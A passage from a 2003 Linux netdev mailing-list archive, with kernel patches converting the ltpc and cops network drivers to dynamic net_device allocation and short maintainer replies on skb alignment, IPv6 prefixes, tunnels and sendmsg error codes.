printk("freeing dma\n"); - if(dev_ltpc.dma) { - free_dma(dev_ltpc.dma); - dev_ltpc.dma = 0; + if(dev_ltpc->dma) { + free_dma(dev_ltpc->dma); + dev_ltpc->dma = 0; } if(debug & DEBUG_VERBOSE) printk("freeing ioaddr\n"); - if(dev_ltpc.base_addr) { - release_region(dev_ltpc.base_addr,8); - dev_ltpc.base_addr = 0; + if(dev_ltpc->base_addr) { + release_region(dev_ltpc->base_addr,8); + dev_ltpc->base_addr = 0; } if(debug & DEBUG_VERBOSE) printk("free_pages\n"); @@ -1343,9 +1331,14 @@ if(debug & DEBUG_VERBOSE) printk("unregister_netdev\n"); - unregister_netdev(&dev_ltpc); + unregister_netdev(dev_ltpc); if(debug & DEBUG_VERBOSE) printk("returning from cleanup_module\n"); + + kfree(dev_ltpc); } +module_init(ltpc_init_module); module_exit(ltpc_cleanup); + +#endif From shemminger@osdl.org Wed Jul 9 13:29:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 13:29:23 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69KTH2x002112 for ; Wed, 9 Jul 2003 13:29:18 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69KTAI29092; Wed, 9 Jul 2003 13:29:10 -0700 Date: Wed, 9 Jul 2003 13:29:10 -0700 From: Stephen Hemminger To: Jeff Garzik , Jay Schulist Cc: netdev@oss.sgi.com Subject: [PATCH 2.5.74] Change appletalk/cops to dynamic allocation of net_device Message-Id: <20030709132910.589cf65d.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3876 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org 
Precedence: bulk X-list: netdev Part of the continuing campaign to fix all network devices to allocate dynamically. Built and loaded/unloaded, but do not have the hardware. Surprisingly, probe succeeds even without hardware. diff -Nru a/drivers/net/appletalk/cops.c b/drivers/net/appletalk/cops.c --- a/drivers/net/appletalk/cops.c Wed Jul 9 12:55:30 2003 +++ b/drivers/net/appletalk/cops.c Wed Jul 9 12:55:30 2003 @@ -235,9 +235,11 @@ * Dayna cards don't autoprobe well at all, but if your card is * at IRQ 5 & IO 0x240 we find it every time. ;) JS */ - for(i=0; cops_portlist[i]; i++) + for(i=0; cops_portlist[i]; i++) { + ltalk_setup(dev); if(cops_probe1(dev, cops_portlist[i]) == 0) return 0; + } return -ENODEV; } @@ -311,24 +313,12 @@ dev->base_addr = ioaddr; /* Initialize the private device structure. */ - dev->priv = kmalloc(sizeof(struct cops_local), GFP_KERNEL); - if(dev->priv == NULL) { - if (dev->irq) - free_irq(dev->irq, dev); - retval = -ENOMEM; - goto err_out; - } - lp = (struct cops_local *)dev->priv; - memset(lp, 0, sizeof(struct cops_local)); spin_lock_init(&lp->lock); /* Copy local board variable to lp struct. */ lp->board = board; - /* Fill in the fields of the device structure with LocalTalk values. */ - ltalk_setup(dev); - dev->hard_start_xmit = cops_send_packet; dev->tx_timeout = cops_timeout; dev->watchdog_timeo = HZ * 2; @@ -1012,44 +1002,50 @@ } #ifdef MODULE -static struct net_device cops0_dev = { .init = cops_probe }; +static struct net_device *cops0_dev; MODULE_LICENSE("GPL"); MODULE_PARM(io, "i"); MODULE_PARM(irq, "i"); MODULE_PARM(board_type, "i"); -int init_module(void) +static int __init cops_init_module(void) { - int result, err; + int err; if(io == 0) printk(KERN_WARNING "%s: You shouldn't autoprobe with insmod\n", cardname); - /* Copy the parameters from insmod into the device structure. 
*/ - cops0_dev.base_addr = io; - cops0_dev.irq = irq; + cops0_dev = alloc_netdev(sizeof(struct cops_local), "lt%d", + ltalk_setup); + + cops0_dev->init = cops_probe; - err=dev_alloc_name(&cops0_dev, "lt%d"); - if(err < 0) - return err; + /* Copy the parameters from insmod into the device structure. */ + cops0_dev->base_addr = io; + cops0_dev->irq = irq; - if((result = register_netdev(&cops0_dev)) != 0) - return result; + if ((err = register_netdev(cops0_dev))) + kfree(cops0_dev); - return 0; + return err; } -void cleanup_module(void) +static void __exit cops_cleanup_module(void) { - unregister_netdev(&cops0_dev); - kfree(cops0_dev.priv); - if(cops0_dev.irq) - free_irq(cops0_dev.irq, &cops0_dev); - release_region(cops0_dev.base_addr, COPS_IO_EXTENT); + unregister_netdev(cops0_dev); + + if(cops0_dev->irq) + free_irq(cops0_dev->irq, cops0_dev); + release_region(cops0_dev->base_addr, COPS_IO_EXTENT); + kfree(cops0_dev); } -#endif /* MODULE */ + +module_init(cops_init_module); +module_exit(cops_cleanup_module); + +#endif /* * Local variables: From shemminger@osdl.org Wed Jul 9 14:45:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 14:45:40 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Lja2x003448 for ; Wed, 9 Jul 2003 14:45:36 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69LjTI12035; Wed, 9 Jul 2003 14:45:29 -0700 Date: Wed, 9 Jul 2003 14:45:29 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: [PATCH] Convert hp100 to useing alloc_etherdev Message-Id: <20030709144529.5c14d995.shemminger@osdl.org> In-Reply-To: <20030708151427.328aae38.shemminger@osdl.org> References: <20030708151427.328aae38.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: 
&@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3877 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This patch won't work for the non-module probe case, will resubmit a better one. From shemminger@osdl.org Wed Jul 9 14:46:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 14:46:22 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69LkE2x003531 for ; Wed, 9 Jul 2003 14:46:14 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69Lk5I12225; Wed, 9 Jul 2003 14:46:05 -0700 Date: Wed, 9 Jul 2003 14:46:05 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: [PATCH 2.5.74] convert apne to dynamic allocation Message-Id: <20030709144605.48f3d4dc.shemminger@osdl.org> In-Reply-To: <20030708151245.179cac2b.shemminger@osdl.org> References: <20030708151245.179cac2b.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3878 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This patch won't work for the non-module case (and it has a typo). 
From davem@redhat.com Wed Jul 9 17:28:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 17:28:42 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A0SY2x007907 for ; Wed, 9 Jul 2003 17:28:35 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA24726; Wed, 9 Jul 2003 17:20:13 -0700 Date: Wed, 09 Jul 2003 17:20:12 -0700 (PDT) Message-Id: <20030709.172012.41656849.davem@redhat.com> To: ak@suse.de Cc: jgarzik@pobox.com, netdev@oss.sgi.com Subject: Re: reasons for dev_alloc_skb +16? From: "David S. Miller" In-Reply-To: <20030709175355.422545b5.ak@suse.de> References: <20030709152553.GB15293@gtf.org> <20030709175355.422545b5.ak@suse.de> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3879 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Andi Kleen Date: Wed, 9 Jul 2003 17:53:55 +0200 But it's not clear it is still a good idea because it leads to cache line misalignment of the beginning of the packet, forcing the card to do a costly Read-Modify-Write cycle. Only "dumb cards" do that, smart ones rewind to the beginning of the current cache line and ask for the whole thing instead of pieces. The +16 is actually needed to align the first hunk of the outgoing packet so we can do a 16-byte aligned memcpy of the hard-header cache as we build the packet. 
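As a rough illustration of the alignment argument above (a userspace sketch, not the kernel's code): if the reserved headroom is always a multiple of 16 bytes, the link-layer header ends on a 16-byte boundary and can be copied in aligned 16-byte chunks. The names HH_MOD, reserved_space() and header_offset() are made up for this example; the authoritative definition is whatever LL_RESERVED_SPACE() says in include/linux/netdevice.h.

```c
#include <stddef.h>

/* Assumed alignment unit for this sketch: 16 bytes. */
#define HH_MOD 16u

/* Headroom to reserve for a link-layer header of hdr_len bytes:
 * round down to a multiple of HH_MOD, then add one full unit.
 * The result is always a multiple of HH_MOD and larger than hdr_len. */
size_t reserved_space(size_t hdr_len)
{
	return (hdr_len & ~(size_t)(HH_MOD - 1)) + HH_MOD;
}

/* Offset inside the reserved area where the header starts, so that
 * it ends exactly at the 16-byte-aligned start of the payload. */
size_t header_offset(size_t hdr_len)
{
	return reserved_space(hdr_len) - hdr_len;
}
```

Under these assumptions a 14-byte Ethernet header gets 16 bytes of headroom and starts at offset 2, so the payload that follows it begins on a 16-byte boundary.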
Jeff, look at LL_RESERVED_SPACE() and the comment above it in include/linux/netdevice.h From jmorris@intercode.com.au Wed Jul 9 18:31:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 18:31:37 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:+8CNk7KKoaKvqKiG9qA1ggxYqyLR+QVh@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A1VR2x010044 for ; Wed, 9 Jul 2003 18:31:28 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6A1Utr28674; Thu, 10 Jul 2003 11:30:56 +1000 Date: Thu, 10 Jul 2003 11:30:55 +1000 (EST) From: James Morris To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: davem@redhat.com, , , Subject: Re: Bug in Linux 2.5.74 IPv6 routing In-Reply-To: <20030710.034425.55677522.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3880 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 10 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > Please apply this patch. > > D: Fix ipv6_addr_prefix() for prefixlen != 0 (mod 8). > D: Patch from Jean-Luc RICHIER . 
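The patch itself is not reproduced in this message. As a hedged sketch of what handling a prefix length that is not a multiple of 8 involves, the userspace function below copies the whole bytes of the prefix and then masks the one partial byte. The name addr_prefix() and the plain byte-array representation are assumptions for illustration, not the kernel's ipv6_addr_prefix().

```c
#include <stdint.h>
#include <string.h>

/* Copy the first plen bits of a 16-byte IPv6 address into out and
 * zero the rest.  plen is assumed to be in the range 0..128. */
void addr_prefix(uint8_t out[16], const uint8_t addr[16], int plen)
{
	int whole = plen >> 3;	/* number of complete bytes in the prefix */
	int bits = plen & 7;	/* leftover bits in the next byte */

	memset(out, 0, 16);
	memcpy(out, addr, (size_t)whole);
	if (bits != 0)
		/* keep only the top 'bits' bits of the partial byte */
		out[whole] = addr[whole] & (uint8_t)(0xff00 >> bits);
}
```

With a /60 prefix, for example, seven bytes are copied whole and only the top four bits of the eighth byte survive.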
Applied to bk://kernel.bkbits.net/jmorris/net-2.5 -- James Morris From davem@redhat.com Wed Jul 9 19:17:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 19:17:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A2H92x010807 for ; Wed, 9 Jul 2003 19:17:09 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id TAA25043; Wed, 9 Jul 2003 19:08:39 -0700 Date: Wed, 09 Jul 2003 19:08:38 -0700 (PDT) Message-Id: <20030709.190838.70200577.davem@redhat.com> To: shemminger@osdl.org Cc: netdev@oss.sgi.com Subject: Re: [PATCH] PPP handling fragmented skbuff's From: "David S. Miller" In-Reply-To: <20030627163524.347b2c8e.shemminger@osdl.org> References: <20030627163524.347b2c8e.shemminger@osdl.org> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3881 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Stephen Hemminger Date: Fri, 27 Jun 2003 16:35:24 -0700 Don't think this ever happens today, but if PPP ever gets a fragmented skbuff and decides to copy it, then bad things will happen. The following replaces the memcpy() calls with skb_copy_bits(). Applied, thanks Stephen.
From davem@redhat.com Wed Jul 9 20:49:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 20:49:20 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A3nD2x011952 for ; Wed, 9 Jul 2003 20:49:14 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id UAA25268; Wed, 9 Jul 2003 20:39:48 -0700 Date: Wed, 09 Jul 2003 20:39:47 -0700 (PDT) Message-Id: <20030709.203947.116374520.davem@redhat.com> To: vnuorval@tcs.hut.fi Cc: yoshfuji@linux-ipv6.org, shemminger@osdl.org, netdev@oss.sgi.com Subject: Re: [PATCH] Tunnel device init patch From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3882 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Ville Nuorvala Date: Fri, 4 Jul 2003 16:00:29 +0300 (EEST) I noticed a couple of bugs(?) in sit.c, ip_gre.c and ipip.c introduced in the alloc_netdev patches (csets 1.305.3.9, 1.305.3.10 and 1.1305.3.11). This patch made against cset 1.384 fixes the following issues: Surely you mean changeset "1.1384" and also changesets "1.1305.3.9, 1.1305..." etc. above too :-) - tunnel dev pointer also set for fallback tunnels - dev name copied back to tunnel parameters so names autogenerated by kernel get correctly reported to userspace Applied, thank you. 
From davem@redhat.com Wed Jul 9 20:52:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 20:52:48 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A3qg2x012277 for ; Wed, 9 Jul 2003 20:52:43 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id UAA25287; Wed, 9 Jul 2003 20:43:12 -0700 Date: Wed, 09 Jul 2003 20:43:12 -0700 (PDT) Message-Id: <20030709.204312.68059397.davem@redhat.com> To: vnuorval@tcs.hut.fi Cc: yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: Fix incorrect dst_entry handling in ip6_tunnel.c From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3883 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Ville Nuorvala Date: Fri, 4 Jul 2003 16:14:18 +0300 (EEST) I noticed a bug in ip6ip6_err(), please apply this patch! Applied, thank you. From jmorris@intercode.com.au Wed Jul 9 21:43:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 21:43:15 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:8qQPMDpdNe7/V2wjfjX63I7fub7VUE57@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A4h12x012989 for ; Wed, 9 Jul 2003 21:43:03 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6A4gjr29383; Thu, 10 Jul 2003 14:42:48 +1000 Date: Thu, 10 Jul 2003 14:42:44 +1000 (EST) From: James Morris To: Jim Keniston cc: LKML , , Andrew Morton , "David S. 
Miller" , Jeff Garzik , Alan Cox , Randy Dunlap Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting In-Reply-To: <3F0AFFE6.E85FF283@us.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3884 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Tue, 8 Jul 2003, Jim Keniston wrote: + kerror_nl = netlink_kernel_create(NETLINK_KERROR, kerror_netlink_rcv); + if (kerror_nl == NULL) + panic("kerror_init: cannot initialize kerror_nl\n"); You can simply use NULL instead of passing the dummy kerror_netlink_rcv function. +struct kern_log_entry { + __u16 log_kmagic; /* always LOGREC_KMAGIC */ + __u16 log_kversion; /* which version of this struct? */ + char log_facility[FACILITY_MAXLEN]; /* e.g., driver name */ These fields should generally be specified in ascending order to help with alignment. It may also be worth looking at how the ULOG code batches messages to improve performance. - James -- James Morris From davem@redhat.com Wed Jul 9 22:56:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 22:56:33 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A5uP2x013654 for ; Wed, 9 Jul 2003 22:56:26 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id WAA25513; Wed, 9 Jul 2003 22:47:00 -0700 Date: Wed, 09 Jul 2003 22:47:00 -0700 (PDT) Message-Id: <20030709.224700.27801124.davem@redhat.com> To: vnuorval@tcs.hut.fi Cc: yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: ipv6-in-ipv6 tunnel using alloc_netdev From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control.
X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3885 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Ville Nuorvala Date: Fri, 4 Jul 2003 23:23:44 +0300 (EEST) I finally had the time to fix ip6_tunnel.c so it also uses alloc_netdev() for creating new tunnel devices. Tested by adding and deleting tunnel device. Patch as attachment... Applied, thanks. From davem@redhat.com Wed Jul 9 23:01:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 23:01:09 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A6142x014023 for ; Wed, 9 Jul 2003 23:01:05 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id WAA25551; Wed, 9 Jul 2003 22:52:41 -0700 Date: Wed, 09 Jul 2003 22:52:41 -0700 (PDT) Message-Id: <20030709.225241.98880784.davem@redhat.com> To: tgraf@suug.ch Cc: netdev@oss.sgi.com Subject: Re: [PATCH] make {send|recv}msg return code 1003.1 compatible From: "David S. Miller" In-Reply-To: <20030709193628.GR2702@rei.rakuen> References: <20030709193628.GR2702@rei.rakuen> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3886 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Thomas Graf Date: Wed, 9 Jul 2003 21:36:28 +0200 1003.1 says: [EMSGSIZE] The msg_iovlen member of the msghdr structure pointed to by message is less than or equal to 0, or is greater than {IOV_MAX}. 
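The rule quoted above can be written down as a small standalone check. This is only a model of the 1003.1 wording, not the kernel change under discussion: check_iovlen() is a hypothetical helper, the 1024 fallback for IOV_MAX is an assumption, and real implementations may be more lenient about some of these values.

```c
#include <errno.h>
#include <limits.h>

/* Fallback if the C library does not expose IOV_MAX; 1024 is an
 * assumption for this sketch, not a value taken from the thread. */
#ifndef IOV_MAX
#define IOV_MAX 1024
#endif

/* Return 0 if iovlen is acceptable under the wording quoted above,
 * or EMSGSIZE if it is <= 0 or greater than IOV_MAX. */
int check_iovlen(long iovlen)
{
	if (iovlen <= 0 || iovlen > IOV_MAX)
		return EMSGSIZE;
	return 0;
}
```

A caller following this model would reject the message with EMSGSIZE before looking at any of the iovec entries.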
The patch changes the return code of {send|recv}msg from EINVAL to EMSGSIZE. Patch applied, thanks. From scott.feldman@intel.com Thu Jul 10 00:47:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 00:47:29 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A7lK2x015324 for ; Thu, 10 Jul 2003 00:47:21 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6A7jAp10742 for ; Thu, 10 Jul 2003 07:45:10 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6A7gTS03362 for ; Thu, 10 Jul 2003 07:42:29 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071000583616414 ; Thu, 10 Jul 2003 00:58:36 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Thu, 10 Jul 2003 00:47:14 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: [PATCH] netdev_ops Date: Thu, 10 Jul 2003 00:47:13 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [PATCH] netdev_ops Thread-Index: AcNGNWOcsUvuyZ5UQHGlJaWR4BWYQwAgbxyg From: "Feldman, Scott" To: "Matthew Wilcox" Cc: X-OriginalArrivalTime: 10 Jul 2003 07:47:14.0449 (UTC) FILETIME=[7A7D3010:01C346B7] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6A7lK2x015324 X-archive-position: 3887 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: 
scott.feldman@intel.com Precedence: bulk X-list: netdev Can we get a HAVE_NETDEV_OPS? From davem@redhat.com Thu Jul 10 00:50:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 00:50:38 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A7oV2x015601 for ; Thu, 10 Jul 2003 00:50:32 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id AAA25812; Thu, 10 Jul 2003 00:42:08 -0700 Date: Thu, 10 Jul 2003 00:42:07 -0700 (PDT) Message-Id: <20030710.004207.35528695.davem@redhat.com> To: scott.feldman@intel.com Cc: willy@debian.org, netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3888 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: "Feldman, Scott" Date: Thu, 10 Jul 2003 00:47:13 -0700 Can we get a HAVE_NETDEV_OPS? Don't tell me you're seriously considering having _TWO_ copies of all this code sitting around? At that point backwards compat becomes absolutely ridiculous. If it's important to you, just stick to the current scheme. You gain nothing by maintaining two copies of the same code.
From scott.feldman@intel.com Thu Jul 10 01:18:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 01:19:06 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A8Iw2x016629 for ; Thu, 10 Jul 2003 01:18:58 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6A8Gmp26269 for ; Thu, 10 Jul 2003 08:16:48 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6A8E7m22456 for ; Thu, 10 Jul 2003 08:14:07 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071001301421284 ; Thu, 10 Jul 2003 01:30:14 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Thu, 10 Jul 2003 01:18:51 -0700 content-class: urn:content-classes:message 